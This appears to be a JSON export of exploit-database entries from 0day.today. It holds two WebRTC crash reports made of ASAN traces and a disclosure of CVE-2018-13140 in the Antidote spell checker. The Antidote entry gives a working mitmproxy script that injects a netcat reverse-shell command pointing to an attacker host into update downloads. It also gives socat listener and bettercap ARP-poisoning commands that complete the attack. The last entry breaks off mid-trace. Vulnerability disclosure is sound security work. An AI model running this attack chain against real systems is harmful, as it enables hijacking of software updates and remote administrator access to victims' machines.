{"zdt": [{"lastseen": "2018-09-22T13:50:17", "references": [], "description": "Exploit for multiple platform in category dos / poc", "edition": 1, "reporter": "Google Security Research", "published": "2018-09-22T00:00:00", "title": "WebRTC - VP9 Processing Use-After-Free Exploit", "type": "zdt", "enchantments": {}, "bulletinFamily": "exploit", "cvelist": ["CVE-2018-16071"], "modified": "2018-09-22T00:00:00", "id": "1337DAY-ID-31143", "href": "https://0day.today/exploit/description/31143", "sourceData": "There is a use-after-free in VP9 processing in WebRTC. In the method RtpFrameReferenceFinder::ManageFrameVp9 the following code occurs:\r\n \r\n auto gof_info_it = gof_info_.find((codec_header.temporal_idx == 0)\r\n ? codec_header.tl0_pic_idx - 1\r\n : codec_header.tl0_pic_idx);\r\n \r\n ... // snip\r\n \r\n info = &gof_info_it->second;\r\n }\r\n \r\n // Clean up info for base layers that are too old.\r\n uint8_t old_tl0_pic_idx = codec_header.tl0_pic_idx - kMaxGofSaved;\r\n auto clean_gof_info_to = gof_info_.lower_bound(old_tl0_pic_idx);\r\n gof_info_.erase(gof_info_.begin(), clean_gof_info_to);\r\n \r\n FrameReceivedVp9(frame->id.picture_id, info);\r\n \r\ntl0_pic_idx is extracted from the incoming packet, and it if is higher than any picture id that exists in gof_info_, the entire vector will be erased, and info will be used in the call FrameReceivedVp9 even though it has been freed.\r\n \r\nASAN output:\r\n \r\n==163231==ERROR: AddressSanitizer: heap-use-after-free on address 0x6060000031d0 at pc 0x0000014b0e1e bp 0x7ffe607dfd30 sp 0x7ffe607dfd28\r\nREAD of size 2 at 0x6060000031d0 thread T0\r\n #0 0x14b0e1d in webrtc::video_coding::RtpFrameReferenceFinder::FrameReceivedVp9(unsigned short, webrtc::video_coding::RtpFrameReferenceFinder::GofInfo*) modules/video_coding/rtp_frame_reference_finder.cc:569:31\r\n #1 0x14ac2c5 in webrtc::video_coding::RtpFrameReferenceFinder::ManageFrameVp9(webrtc::video_coding::RtpFrameObject*) modules/video_coding/rtp_frame_reference_finder.cc:499:3\r\n #2 0x14a7849 in ManageFrameInternal modules/video_coding/rtp_frame_reference_finder.cc:89:14\r\n #3 0x14a7849 in webrtc::video_coding::RtpFrameReferenceFinder::ManageFrame(std::__1::unique_ptr<webrtc::video_coding::RtpFrameObject, std::__1::default_delete<webrtc::video_coding::RtpFrameObject> >) modules/video_coding/rtp_frame_reference_finder.cc:43\r\n #4 0x148a87e in non-virtual thunk to webrtc::RtpVideoStreamReceiver::OnReceivedFrame(std::__1::unique_ptr<webrtc::video_coding::RtpFrameObject, std::__1::default_delete<webrtc::video_coding::RtpFrameObject> >) video/rtp_video_stream_receiver.cc:336:22\r\n #5 0x1496f41 in webrtc::video_coding::PacketBuffer::InsertPacket(webrtc::VCMPacket*) modules/video_coding/packet_buffer.cc:130:31\r\n #6 0x1487e59 in webrtc::RtpVideoStreamReceiver::OnReceivedPayloadData(unsigned char const*, unsigned long, webrtc::WebRtcRTPHeader const*) video/rtp_video_stream_receiver.cc:231:19\r\n #7 0x12d9144 in webrtc::RTPReceiverVideo::ParseRtpPacket(webrtc::WebRtcRTPHeader*, webrtc::PayloadUnion const&, unsigned char const*, unsigned long, long) modules/rtp_rtcp/source/rtp_receiver_video.cc:109:26\r\n #8 0x12cc80d in webrtc::RtpReceiverImpl::IncomingRtpPacket(webrtc::RTPHeader const&, unsigned char const*, unsigned long, webrtc::PayloadUnion) modules/rtp_rtcp/source/rtp_receiver_impl.cc:181:42\r\n #9 0x1488e52 in webrtc::RtpVideoStreamReceiver::ReceivePacket(unsigned char const*, unsigned long, webrtc::RTPHeader const&) video/rtp_video_stream_receiver.cc:399:20\r\n #10 0x1488b03 in webrtc::RtpVideoStreamReceiver::OnRecoveredPacket(unsigned char const*, unsigned long) video/rtp_video_stream_receiver.cc:245:3\r\n #11 0x14b925c in webrtc::UlpfecReceiverImpl::ProcessReceivedFec() modules/rtp_rtcp/source/ulpfec_receiver_impl.cc:244:35\r\n #12 0x148bd42 in webrtc::RtpVideoStreamReceiver::ParseAndHandleEncapsulatingHeader(unsigned char const*, unsigned long, webrtc::RTPHeader const&) video/rtp_video_stream_receiver.cc:421:23\r\n #13 0x1488d51 in webrtc::RtpVideoStreamReceiver::ReceivePacket(unsigned char const*, unsigned long, webrtc::RTPHeader const&) video/rtp_video_stream_receiver.cc:390:5\r\n #14 0x14899f8 in webrtc::RtpVideoStreamReceiver::OnRtpPacket(webrtc::RtpPacketReceived const&) video/rtp_video_stream_receiver.cc:290:3\r\n #15 0x90c486 in webrtc::RtpDemuxer::OnRtpPacket(webrtc::RtpPacketReceived const&) call/rtp_demuxer.cc:157:11\r\n #16 0x9131bd in webrtc::RtpStreamReceiverController::OnRtpPacket(webrtc::RtpPacketReceived const&) call/rtp_stream_receiver_controller.cc:55:19\r\n #17 0x129940d in webrtc::internal::Call::DeliverRtp(webrtc::MediaType, rtc::CopyOnWriteBuffer, webrtc::PacketTime const&) call/call.cc:1321:36\r\n #18 0x129a8d5 in webrtc::internal::Call::DeliverPacket(webrtc::MediaType, rtc::CopyOnWriteBuffer, webrtc::PacketTime const&) call/call.cc:1361:10\r\n #19 0x61fe06 in webrtc::RtpReplay() video/replay.cc:279:31\r\n #20 0x62337d in main video/replay.cc:343:3\r\n #21 0x7f5ae03d82b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)\r\n \r\n0x6060000031d0 is located 48 bytes inside of 56-byte region [0x6060000031a0,0x6060000031d8)\r\nfreed by thread T0 here:\r\n #0 0x61bbb2 in operator delete(void*) /b/build/slave/linux_upload_clang/build/src/third_party/llvm/compiler-rt/lib/asan/asan_new_delete.cc:150:3\r\n #1 0x14ac26c in __libcpp_deallocate buildtools/third_party/libc++/trunk/include/new:279:10\r\n #2 0x14ac26c in deallocate buildtools/third_party/libc++/trunk/include/memory:1802\r\n #3 0x14ac26c in deallocate buildtools/third_party/libc++/trunk/include/memory:1556\r\n #4 0x14ac26c in erase buildtools/third_party/libc++/trunk/include/__tree:2370\r\n #5 0x14ac26c in erase buildtools/third_party/libc++/trunk/include/__tree:2379\r\n #6 0x14ac26c in erase buildtools/third_party/libc++/trunk/include/map:1200\r\n #7 0x14ac26c in webrtc::video_coding::RtpFrameReferenceFinder::ManageFrameVp9(webrtc::video_coding::RtpFrameObject*) modules/video_coding/rtp_frame_reference_finder.cc:497\r\n #8 0x14a7849 in ManageFrameInternal modules/video_coding/rtp_frame_reference_finder.cc:89:14\r\n #9 0x14a7849 in webrtc::video_coding::RtpFrameReferenceFinder::ManageFrame(std::__1::unique_ptr<webrtc::video_coding::RtpFrameObject, std::__1::default_delete<webrtc::video_coding::RtpFrameObject> >) modules/video_coding/rtp_frame_reference_finder.cc:43\r\n #10 0x148a87e in non-virtual thunk to webrtc::RtpVideoStreamReceiver::OnReceivedFrame(std::__1::unique_ptr<webrtc::video_coding::RtpFrameObject, std::__1::default_delete<webrtc::video_coding::RtpFrameObject> >) video/rtp_video_stream_receiver.cc:336:22\r\n #11 0x1496f41 in webrtc::video_coding::PacketBuffer::InsertPacket(webrtc::VCMPacket*) modules/video_coding/packet_buffer.cc:130:31\r\n #12 0x1487e59 in webrtc::RtpVideoStreamReceiver::OnReceivedPayloadData(unsigned char const*, unsigned long, webrtc::WebRtcRTPHeader const*) video/rtp_video_stream_receiver.cc:231:19\r\n #13 0x12d9144 in webrtc::RTPReceiverVideo::ParseRtpPacket(webrtc::WebRtcRTPHeader*, webrtc::PayloadUnion const&, unsigned char const*, unsigned long, long) modules/rtp_rtcp/source/rtp_receiver_video.cc:109:26\r\n #14 0x12cc80d in webrtc::RtpReceiverImpl::IncomingRtpPacket(webrtc::RTPHeader const&, unsigned char const*, unsigned long, webrtc::PayloadUnion) modules/rtp_rtcp/source/rtp_receiver_impl.cc:181:42\r\n #15 0x1488e52 in webrtc::RtpVideoStreamReceiver::ReceivePacket(unsigned char const*, unsigned long, webrtc::RTPHeader const&) video/rtp_video_stream_receiver.cc:399:20\r\n #16 0x1488b03 in webrtc::RtpVideoStreamReceiver::OnRecoveredPacket(unsigned char const*, unsigned long) video/rtp_video_stream_receiver.cc:245:3\r\n #17 0x14b925c in webrtc::UlpfecReceiverImpl::ProcessReceivedFec() modules/rtp_rtcp/source/ulpfec_receiver_impl.cc:244:35\r\n #18 0x148bd42 in webrtc::RtpVideoStreamReceiver::ParseAndHandleEncapsulatingHeader(unsigned char const*, unsigned long, webrtc::RTPHeader const&) video/rtp_video_stream_receiver.cc:421:23\r\n #19 0x1488d51 in webrtc::RtpVideoStreamReceiver::ReceivePacket(unsigned char const*, unsigned long, webrtc::RTPHeader const&) video/rtp_video_stream_receiver.cc:390:5\r\n #20 0x14899f8 in webrtc::RtpVideoStreamReceiver::OnRtpPacket(webrtc::RtpPacketReceived const&) video/rtp_video_stream_receiver.cc:290:3\r\n #21 0x90c486 in webrtc::RtpDemuxer::OnRtpPacket(webrtc::RtpPacketReceived const&) call/rtp_demuxer.cc:157:11\r\n #22 0x9131bd in webrtc::RtpStreamReceiverController::OnRtpPacket(webrtc::RtpPacketReceived const&) call/rtp_stream_receiver_controller.cc:55:19\r\n #23 0x129940d in webrtc::internal::Call::DeliverRtp(webrtc::MediaType, rtc::CopyOnWriteBuffer, webrtc::PacketTime const&) call/call.cc:1321:36\r\n #24 0x129a8d5 in webrtc::internal::Call::DeliverPacket(webrtc::MediaType, rtc::CopyOnWriteBuffer, webrtc::PacketTime const&) call/call.cc:1361:10\r\n #25 0x61fe06 in webrtc::RtpReplay() video/replay.cc:279:31\r\n #26 0x62337d in main video/replay.cc:343:3\r\n #27 0x7f5ae03d82b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)\r\n \r\npreviously allocated by thread T0 here:\r\n #0 0x61af72 in operator new(unsigned long) /b/build/slave/linux_upload_clang/build/src/third_party/llvm/compiler-rt/lib/asan/asan_new_delete.cc:93:3\r\n #1 0x14b664f in __libcpp_allocate buildtools/third_party/libc++/trunk/include/new:259:10\r\n #2 0x14b664f in allocate buildtools/third_party/libc++/trunk/include/memory:1799\r\n #3 0x14b664f in allocate buildtools/third_party/libc++/trunk/include/memory:1548\r\n #4 0x14b664f in __construct_node<const short &, webrtc::video_coding::RtpFrameReferenceFinder::GofInfo> buildtools/third_party/libc++/trunk/include/__tree:2191\r\n #5 0x14b664f in std::__1::pair<std::__1::__tree_iterator<std::__1::__value_type<unsigned char, webrtc::video_coding::RtpFrameReferenceFinder::GofInfo>, std::__1::__tree_node<std::__1::__value_type<unsigned char, webrtc::video_coding::RtpFrameReferenceFinder::GofInfo>, void*>*, long>, bool> std::__1::__tree<std::__1::__value_type<unsigned char, webrtc::video_coding::RtpFrameReferenceFinder::GofInfo>, std::__1::__map_value_compare<unsigned char, std::__1::__value_type<unsigned char, webrtc::video_coding::RtpFrameReferenceFinder::GofInfo>, webrtc::DescendingSeqNumComp<unsigned char, (unsigned char)0>, true>, std::__1::allocator<std::__1::__value_type<unsigned char, webrtc::video_coding::RtpFrameReferenceFinder::GofInfo> > >::__emplace_unique_impl<short const&, webrtc::video_coding::RtpFrameReferenceFinder::GofInfo>(short const&, webrtc::video_coding::RtpFrameReferenceFinder::GofInfo&&) buildtools/third_party/libc++/trunk/include/__tree:2203\r\n #6 0x14ab9ca in __emplace_unique<const short &, webrtc::video_coding::RtpFrameReferenceFinder::GofInfo> buildtools/third_party/libc++/trunk/include/__tree:1193:16\r\n #7 0x14ab9ca in emplace<const short &, webrtc::video_coding::RtpFrameReferenceFinder::GofInfo> buildtools/third_party/libc++/trunk/include/map:1041\r\n #8 0x14ab9ca in webrtc::video_coding::RtpFrameReferenceFinder::ManageFrameVp9(webrtc::video_coding::RtpFrameObject*) modules/video_coding/rtp_frame_reference_finder.cc:445\r\n #9 0x14a7849 in ManageFrameInternal modules/video_coding/rtp_frame_reference_finder.cc:89:14\r\n #10 0x14a7849 in webrtc::video_coding::RtpFrameReferenceFinder::ManageFrame(std::__1::unique_ptr<webrtc::video_coding::RtpFrameObject, std::__1::default_delete<webrtc::video_coding::RtpFrameObject> >) modules/video_coding/rtp_frame_reference_finder.cc:43\r\n #11 0x148a87e in non-virtual thunk to webrtc::RtpVideoStreamReceiver::OnReceivedFrame(std::__1::unique_ptr<webrtc::video_coding::RtpFrameObject, std::__1::default_delete<webrtc::video_coding::RtpFrameObject> >) video/rtp_video_stream_receiver.cc:336:22\r\n #12 0x1496f41 in webrtc::video_coding::PacketBuffer::InsertPacket(webrtc::VCMPacket*) modules/video_coding/packet_buffer.cc:130:31\r\n #13 0x1487e59 in webrtc::RtpVideoStreamReceiver::OnReceivedPayloadData(unsigned char const*, unsigned long, webrtc::WebRtcRTPHeader const*) video/rtp_video_stream_receiver.cc:231:19\r\n #14 0x12d9144 in webrtc::RTPReceiverVideo::ParseRtpPacket(webrtc::WebRtcRTPHeader*, webrtc::PayloadUnion const&, unsigned char const*, unsigned long, long) modules/rtp_rtcp/source/rtp_receiver_video.cc:109:26\r\n #15 0x12cc80d in webrtc::RtpReceiverImpl::IncomingRtpPacket(webrtc::RTPHeader const&, unsigned char const*, unsigned long, webrtc::PayloadUnion) modules/rtp_rtcp/source/rtp_receiver_impl.cc:181:42\r\n #16 0x1488e52 in webrtc::RtpVideoStreamReceiver::ReceivePacket(unsigned char const*, unsigned long, webrtc::RTPHeader const&) video/rtp_video_stream_receiver.cc:399:20\r\n #17 0x1488b03 in webrtc::RtpVideoStreamReceiver::OnRecoveredPacket(unsigned char const*, unsigned long) video/rtp_video_stream_receiver.cc:245:3\r\n #18 0x14b925c in webrtc::UlpfecReceiverImpl::ProcessReceivedFec() modules/rtp_rtcp/source/ulpfec_receiver_impl.cc:244:35\r\n #19 0x148bd42 in webrtc::RtpVideoStreamReceiver::ParseAndHandleEncapsulatingHeader(unsigned char const*, unsigned long, webrtc::RTPHeader const&) video/rtp_video_stream_receiver.cc:421:23\r\n #20 0x1488d51 in webrtc::RtpVideoStreamReceiver::ReceivePacket(unsigned char const*, unsigned long, webrtc::RTPHeader const&) video/rtp_video_stream_receiver.cc:390:5\r\n #21 0x14899f8 in webrtc::RtpVideoStreamReceiver::OnRtpPacket(webrtc::RtpPacketReceived const&) video/rtp_video_stream_receiver.cc:290:3\r\n #22 0x90c486 in webrtc::RtpDemuxer::OnRtpPacket(webrtc::RtpPacketReceived const&) call/rtp_demuxer.cc:157:11\r\n #23 0x9131bd in webrtc::RtpStreamReceiverController::OnRtpPacket(webrtc::RtpPacketReceived const&) call/rtp_stream_receiver_controller.cc:55:19\r\n #24 0x129940d in webrtc::internal::Call::DeliverRtp(webrtc::MediaType, rtc::CopyOnWriteBuffer, webrtc::PacketTime const&) call/call.cc:1321:36\r\n #25 0x129a8d5 in webrtc::internal::Call::DeliverPacket(webrtc::MediaType, rtc::CopyOnWriteBuffer, webrtc::PacketTime const&) call/call.cc:1361:10\r\n #26 0x61fe06 in webrtc::RtpReplay() video/replay.cc:279:31\r\n #27 0x62337d in main video/replay.cc:343:3\r\n #28 0x7f5ae03d82b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)\r\n \r\nSUMMARY: AddressSanitizer: heap-use-after-free modules/video_coding/rtp_frame_reference_finder.cc:569:31 in webrtc::video_coding::RtpFrameReferenceFinder::FrameReceivedVp9(unsigned short, webrtc::video_coding::RtpFrameReferenceFinder::GofInfo*)\r\nShadow bytes around the buggy address:\r\n 0x0c0c7fff85e0: 00 00 00 00 00 00 00 fa fa fa fa fa fd fd fd fd\r\n 0x0c0c7fff85f0: fd fd fd fd fa fa fa fa 00 00 00 00 00 00 00 00\r\n 0x0c0c7fff8600: fa fa fa fa 00 00 00 00 00 00 00 00 fa fa fa fa\r\n 0x0c0c7fff8610: 00 00 00 00 00 00 00 00 fa fa fa fa 00 00 00 00\r\n 0x0c0c7fff8620: 00 00 00 00 fa fa fa fa fd fd fd fd fd fd fd fa\r\n=>0x0c0c7fff8630: fa fa fa fa fd fd fd fd fd fd[fd]fa fa fa fa fa\r\n 0x0c0c7fff8640: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c0c7fff8650: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c0c7fff8660: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c0c7fff8670: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c0c7fff8680: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n Shadow gap: cc\r\n==163231==ABORTING\r\n \r\nTo reproduce the issue:\r\n \r\n1) apply new.patch to your webrtc directory\r\n2) build video_replay\r\n3) download the attached filed into the same directory\r\n4) run ./video_replay --input_file uaf\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/45443.zip\n\n# 0day.today [2018-09-22] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/31143"}, {"lastseen": "2018-09-22T13:48:48", "references": [], "description": "Exploit for multiple platform in category remote exploits", "edition": 1, "reporter": "Mickael Karatekin", "published": "2018-09-22T00:00:00", "title": "Antidote 9.5.1 Code Execution Exploit", "type": "zdt", "enchantments": {}, "bulletinFamily": "exploit", "cvelist": ["CVE-2018-13140"], "modified": "2018-09-22T00:00:00", "id": "1337DAY-ID-31149", "href": "https://0day.today/exploit/description/31149", "sourceData": "# [CVE-2018-13140] Antidote Remote Code Execution against the update\r\ncomponent\r\n\r\n## Description\r\n\r\nAntidote is a spell checker software for Windows, Linux macOS operating\r\nsystem.\r\n\r\n**Threat**\r\n\r\nThe application is affected by a remote code execution against the\r\nupdate component. It leads to code execution with high privileges\r\nagainst the targeted system.\r\n\r\n**Expectation**\r\n\r\nNetwork operations like an update component should be held through\r\nencrypted communication channels like TLS, to prevent all sorts of\r\nhijacking attacks.\r\n\r\n## CVSS Score:\r\n\r\n**CVE ID**: CVE-2018-13140\r\n\r\n**Access Vector**: remote\r\n\r\n**Security Risk**: high\r\n\r\n**Vulnerability**: CWE-311\r\n\r\n**CVSS Base Score**: 8.2\r\n\r\n**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:L\r\n\r\n# Details\r\n\r\nAntidote downloads its installation packages over HTTP protocol, without\r\nany kind of encryption such as TLS.\r\n\r\nAn attacker can thus perform a Man-In-The-Middle attack to intercept the\r\nupdate request / response in order to replace or patch the downloaded\r\npackage.\r\n\r\nMoreover, after the download is done, the component asks for\r\nadministrator rights to install the update, allowing thus an attacker to\r\nrun the payload as an administrator with privileged rights.\r\n\r\n\r\n## Proof of Concept\r\n\r\nWe developed a simple `mitm-proxy` module to exploit this vulnerability,\r\nhere the python source code:\r\n\r\n```\r\n#(this script works best with --anticache)\r\n\r\nfrom mitmproxy import http\r\n\r\nMATCH = \"export \"\r\nCMD_TO_INJECT = \"nc -e /bin/bash IP_OF_ATTACKER 4444&\"\r\n\r\nclass Injector:\r\n def response(self, flow: http.HTTPFlow) -> None:\r\n if MATCH.encode() in flow.response.content:\r\n print(\"Match detected\")\r\n cmd = \"\\n%s\\n%s\" % (CMD_TO_INJECT, MATCH)\r\n flow.response.content =\r\nflow.response.content.replace(MATCH.encode(),cmd.encode())\r\n\r\naddons = [Injector()]\r\n```\r\n\r\nThe previous script is looking for the `export ` string for each HTTP\r\nresponses, in order to replace it with a simple command to give the\r\nattacker a remote reverse shell. Thereafter, when the update script is\r\ncalled by the update software component, the simple command is firstly\r\nrun as a simple user. The update script asks then user for the\r\nadministrator password, allowing our command to be executed as\r\nadministrator.\r\n\r\nIn fact, we could thus obtain two remote shells (as simple user and\r\nadministrator), using a multithreaded listening TCP handler:\r\n\r\n* The first one when the script is started (user privileges) ;\r\n\r\n* The second one after the victim types his credentials (administrator\r\nprivileges).\r\n\r\nThe following commands are used to exploit the vulnerability, using a\r\nMan-In-The-Middle attack:\r\n\r\n* a multithreaded `socat` TCP listener, to receive the victim reverse\r\nconnection with low privileges against the target:\r\n\r\n```\r\nsocat - TCP-LISTEN:4444,fork\r\n```\r\n\r\n* the mitm-proxy with our dedicated module:\r\n\r\n```\r\nmitmproxy -s antidote.py --anticache --listen-port 9090 -m transparent\r\n```\r\n\r\n* ARP Cache Poisoning using bettercap and redirecting traffic to mitm-proxy:\r\n\r\n```\r\nbettercap -I YOUR_NETWORK_INTERFACE -T VICTIM_IP_ADDRESS --custom-proxy\r\nYOUR_IP_ADDRESS --custom-proxy-port 9090 -S ARP\r\n```\r\n\r\nWhen the Antidote software asks for an update, `mitmproxy` will\r\nautomatically patch the update component using our reverse shell payload\r\nincluded.\r\n\r\nAfter the end of the download, the user will press `install`, leading to\r\nthe execution of the two payloads, as described.\r\n\r\n## Timeline (dd/mm/yyyy)\r\n\r\nCongratulations to Druide for handling this security response very\r\nquickly and professionally:\r\n\r\n* 30/04/2018 : Initial discovery.\r\n* 30/04/2018 : Contact acknowledgment.\r\n* 11/05/2018 : Detailed report communicated to Druide.\r\n* 12/05/2018 : Technical response, confirming the vulnerability and\r\nstating which versions are affected (Windows, Linux, but not Mac OS).\r\n* 08/06/2018 : Follow up e-mail from Druide informing about the patching\r\ndevelopment status and roadmap.\r\n* 23/06/2018 : Druide informs us of the fixed versions and suggest a\r\ndisclosure date on 31/07/2018 to let enough time for customers to patch.\r\n* 21/09/2018 : Disclosure.\r\n\r\n## Fixes\r\n\r\n* Antidote 9.5.2 (Windows/Linux)\r\n* Antidote 8.5.2 (Windows)\r\n* Antidote HD 6.1.2 (Windows)\r\n\r\n## Affected versions\r\n\r\n* All Antidote Windows/Linux versions <= 9.5.1\r\n* Mac OS versions are unaffected (already using TLS encryption for updates)\n\n# 0day.today [2018-09-22] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/31149"}, {"lastseen": "2018-09-22T13:48:28", "references": [], "description": "Exploit for multiple platform in category dos / poc", "edition": 1, "reporter": "Google Security Research", "published": "2018-09-22T00:00:00", "title": "WebRTC - FEC Out-of-Bounds Read Exploit", "type": "zdt", "enchantments": {}, "bulletinFamily": "exploit", "cvelist": ["CVE-2018-16083"], "modified": "2018-09-22T00:00:00", "id": "1337DAY-ID-31144", "href": "https://0day.today/exploit/description/31144", "sourceData": "There is an out-of-bounds read in FEC processing in WebRTC. If a very short RTP packet is received, FEC will assume the packet is longer and process data outside of the allocated buffer.\r\n \r\nThis bug causes the following ASAN crash:\r\n \r\n==109993==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b003b7ff70 at pc 0x55e01a250cd1 bp 0x7fa3af7abc40 sp 0x7fa3af7abc38\r\nREAD of size 1 at 0x61b003b7ff70 thread T15 (Chrome_libJingl)\r\n #0 0x55e01a250cd0 in XorPayloads third_party/webrtc/modules/rtp_rtcp/source/forward_error_correction.cc:615:34\r\n #1 0x55e01a250cd0 in webrtc::ForwardErrorCorrection::RecoverPacket(webrtc::ForwardErrorCorrection::ReceivedFecPacket const&, webrtc::ForwardErrorCorrection::RecoveredPacket*) third_party/webrtc/modules/rtp_rtcp/source/forward_error_correction.cc:630\r\n #2 0x55e01a251162 in webrtc::ForwardErrorCorrection::AttemptRecovery(std::__1::list<std::__1::unique_ptr<webrtc::ForwardErrorCorrection::RecoveredPacket, std::__1::default_delete<webrtc::ForwardErrorCorrection::RecoveredPacket> >, std::__1::allocator<std::__1::unique_ptr<webrtc::ForwardErrorCorrection::RecoveredPacket, std::__1::default_delete<webrtc::ForwardErrorCorrection::RecoveredPacket> > > >*) third_party/webrtc/modules/rtp_rtcp/source/forward_error_correction.cc:652:12\r\n #3 0x55e01a251b12 in webrtc::ForwardErrorCorrection::DecodeFec(webrtc::ForwardErrorCorrection::ReceivedPacket const&, std::__1::list<std::__1::unique_ptr<webrtc::ForwardErrorCorrection::RecoveredPacket, std::__1::default_delete<webrtc::ForwardErrorCorrection::RecoveredPacket> >, std::__1::allocator<std::__1::unique_ptr<webrtc::ForwardErrorCorrection::RecoveredPacket, std::__1::default_delete<webrtc::ForwardErrorCorrection::RecoveredPacket> > > >*) third_party/webrtc/modules/rtp_rtcp/source/forward_error_correction.cc:739:3\r\n #4 0x55e01a4c5595 in webrtc::UlpfecReceiverImpl::ProcessReceivedFec() third_party/webrtc/modules/rtp_rtcp/source/ulpfec_receiver_impl.cc:248:11\r\n #5 0x55e01a4a1bb9 in webrtc::RtpVideoStreamReceiver::ParseAndHandleEncapsulatingHeader(unsigned char const*, unsigned long, webrtc::RTPHeader const&) third_party/webrtc/video/rtp_video_stream_receiver.cc:419:23\r\n #6 0x55e01a49f05b in webrtc::RtpVideoStreamReceiver::ReceivePacket(unsigned char const*, unsigned long, webrtc::RTPHeader const&) third_party/webrtc/video/rtp_video_stream_receiver.cc:390:5\r\n #7 0x55e01a49fcf2 in webrtc::RtpVideoStreamReceiver::OnRtpPacket(webrtc::RtpPacketReceived const&) third_party/webrtc/video/rtp_video_stream_receiver.cc:290:3\r\n #8 0x55e009a368a1 in webrtc::RtpDemuxer::OnRtpPacket(webrtc::RtpPacketReceived const&) third_party/webrtc/call/rtp_demuxer.cc:157:11\r\n #9 0x55e009a3b6e1 in webrtc::RtpStreamReceiverController::OnRtpPacket(webrtc::RtpPacketReceived const&) third_party/webrtc/call/rtp_stream_receiver_controller.cc:55:19\r\n #10 0x55e01a231339 in webrtc::internal::Call::DeliverRtp(webrtc::MediaType, rtc::CopyOnWriteBuffer, webrtc::PacketTime const&) third_party/webrtc/call/call.cc:1321:36\r\n #11 0x55e01a232300 in webrtc::internal::Call::DeliverPacket(webrtc::MediaType, rtc::CopyOnWriteBuffer, webrtc::PacketTime const&) third_party/webrtc/call/call.cc:1361:10\r\n #12 0x55e01a95d341 in cricket::WebRtcVideoChannel::OnPacketReceived(rtc::CopyOnWriteBuffer*, rtc::PacketTime const&) third_party/webrtc/media/engine/webrtcvideoengine.cc:1441:26\r\n #13 0x55e01a1d8dc2 in cricket::BaseChannel::ProcessPacket(bool, rtc::CopyOnWriteBuffer const&, rtc::PacketTime const&) third_party/webrtc/pc/channel.cc\r\n #14 0x55e01a1f6760 in rtc::AsyncInvoker::OnMessage(rtc::Message*) third_party/webrtc/rtc_base/asyncinvoker.cc:45:22\r\n #15 0x55e01a0a6aa1 in jingle_glue::JingleThreadWrapper::Dispatch(rtc::Message*) jingle/glue/thread_wrapper.cc:157:22\r\n #16 0x55e01a0a7d7e in jingle_glue::JingleThreadWrapper::RunTask(int) jingle/glue/thread_wrapper.cc:279:7\r\n #17 0x55e00d52b6f5 in Run base/callback.h:96:12\r\n #18 0x55e00d52b6f5 in base::debug::TaskAnnotator::RunTask(char const*, base::PendingTask*) base/debug/task_annotator.cc:101\r\n #19 0x55e00d5881d5 in base::MessageLoop::RunTask(base::PendingTask*) base/message_loop/message_loop.cc:319:25\r\n #20 0x55e00d589444 in DeferOrRunPendingTask base/message_loop/message_loop.cc:329:5\r\n #21 0x55e00d589444 in base::MessageLoop::DoWork() base/message_loop/message_loop.cc:373\r\n #22 0x55e00d591acf in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) base/message_loop/message_pump_default.cc:37:31\r\n #23 0x55e00d600551 in base::RunLoop::Run() base/run_loop.cc:102:14\r\n #24 0x55e00d6878b4 in base::Thread::ThreadMain() base/threading/thread.cc:337:3\r\n #25 0x55e00d73c694 in base::(anonymous namespace)::ThreadFunc(void*) base/threading/platform_thread_posix.cc:76:13\r\n #26 0x7fa3d586f493 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x7493)\r\n \r\n0x61b003b7ff70 is located 0 bytes to the right of 1520-byte region [0x61b003b7f980,0x61b003b7ff70)\r\nallocated by thread T15 (Chrome_libJingl) here:\r\n #0 0x55e00607ef92 in operator new(unsigned long) /b/build/slave/linux_upload_clang/build/src/third_party/llvm/compiler-rt/lib/asan/asan_new_delete.cc:93:3\r\n #1 0x55e01a4c3eeb in webrtc::UlpfecReceiverImpl::AddReceivedRedPacket(webrtc::RTPHeader const&, unsigned char const*, unsigned long, unsigned char) third_party/webrtc/modules/rtp_rtcp/source/ulpfec_receiver_impl.cc:101:26\r\n #2 0x55e01a4a1b6f in webrtc::RtpVideoStreamReceiver::ParseAndHandleEncapsulatingHeader(unsigned char const*, unsigned long, webrtc::RTPHeader const&) third_party/webrtc/video/rtp_video_stream_receiver.cc:414:27\r\n #3 0x55e01a49f05b in webrtc::RtpVideoStreamReceiver::ReceivePacket(unsigned char const*, unsigned long, webrtc::RTPHeader const&) third_party/webrtc/video/rtp_video_stream_receiver.cc:390:5\r\n #4 0x55e01a49fcf2 in webrtc::RtpVideoStreamReceiver::OnRtpPacket(webrtc::RtpPacketReceived const&) third_party/webrtc/video/rtp_video_stream_receiver.cc:290:3\r\n #5 0x55e009a368a1 in webrtc::RtpDemuxer::OnRtpPacket(webrtc::RtpPacketReceived const&) third_party/webrtc/call/rtp_demuxer.cc:157:11\r\n #6 0x55e009a3b6e1 in webrtc::RtpStreamReceiverController::OnRtpPacket(webrtc::RtpPacketReceived const&) third_party/webrtc/call/rtp_stream_receiver_controller.cc:55:19\r\n #7 0x55e01a231339 in 